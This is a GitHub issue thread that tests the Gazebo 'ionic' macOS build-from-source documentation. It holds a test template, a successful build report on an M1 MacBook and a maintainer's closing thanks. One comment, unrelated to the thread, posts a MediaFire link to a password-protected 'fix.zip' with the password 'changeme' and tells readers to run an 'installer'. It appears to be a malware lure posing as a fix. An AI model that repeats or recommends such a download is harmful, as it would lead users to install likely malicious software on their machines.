gazebosim/gazebo_test_cases #1700: docs: install_osx_src

azeey-test, 2024-08-29:
## Configuration

* os: MacOS
* buildType: Source

## Links

* [Live](https://gazebosim.org/docs/ionic/install_osx_src)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/install_osx_src.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

fan1chun, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Yadunund, 2024-09-02:
I've successfully built `ionic` from source on an `M1 Macbook Pro 14.6.1` 

Image proof below:

[image]

ahcorde, 2024-09-02:
Thank you for testing!

closed 2024-09-02 by ahcorde